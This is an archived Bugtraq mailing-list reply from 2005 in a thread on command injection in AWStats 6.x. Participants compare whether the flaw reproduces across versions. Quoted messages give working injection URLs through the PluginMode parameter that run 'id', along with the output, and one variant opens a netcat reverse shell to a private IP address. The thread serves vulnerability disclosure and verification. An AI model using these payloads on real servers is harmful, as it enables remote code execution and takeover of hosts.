Bugtraq mailing list archives
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
From: Herman Sheremetyev <herman () swebpage com>
Date: Tue, 15 Feb 2005 16:38:03 -0500
It works on mine too, though I still have 6.1. I think you may need to add the config=www.example.com into the url between the '?' and the '&' for it to work properly though. On my linux boxes with apache 2.0 it displays the command output in the page but on openbsd with apache 1.3 it gives a 500 Server Error because the output ends up in the headers somehow. Either way it works though.
-Herman Ondra Holecek wrote:
It seems this bug works only on my server, i dont know why /awstats.pl?&PluginMode=:print+system('id')+; reply: uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256 Error: Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). awstats: Advanced Web Statistics 6.1 (build 1.751) (original) perl: This is perl, v5.8.5 built for i586-linux os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown unknown GNU/Linux Ondra Jamie Pratt wrote: | So what are the conditions of this bug/vuln? I can't reproduce this on | several 6.3 installs..: | | awstats 6.3 from source: | | request: | |http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;| | | output: | **************** | Error: Can't locate object method "BuildFullHTMLOutput_print" via | package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) | line 1. | | Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or | permissions) may be wrong. | Check config file, permissions and AWStats documentation (in 'docs' | directory). | *************** | | regards, | jamie | | Ondra Holecek wrote: | |> |> |> GHC () www securityfocus com wrote: |> | |> | /*==========================================*/ |> | // GHC -> AWStats <- ADVISORY |> | \\ PRODUCT: AWStats |> | // VERSION: <= 6.3 |> | \\ URL: http://awstats.sourceforge.net/ |> | // VULNERABILITY CLASS: Multiple vulnerabilities |> | \\ RISK: high |> | /*==========================================*/ |> |> [...] |> |> | |> | PluginMode=:print+getpwent |> | |> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. |> | This will satisfy eval() requirements., and :print getpwent() is |> executed. |> | |> | |>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent|> |> | |> | Sanitazing limits user's input, but there is no filtration for call |> sympols '()'. |> |> no, user is not limited, he can execute ANY command if he add ; at the |> end of the command, try this |> |> awstats.pl?&PluginMode=:print+system('id')+; |> |> or even this |> |> awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+; |> |> |> Ondra | |
Current thread:
- AWStats <= 6.4 Multiple vulnerabilities GHC (Feb 14)
- Re: AWStats <= 6.4 Multiple vulnerabilities Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Herman Sheremetyev (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Thom Craver (Feb 16)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Micah Brandon (Feb 16)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Matt Wilder (Feb 17)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Jamie Pratt (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Ondra Holecek (Feb 15)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? twebster (Feb 15)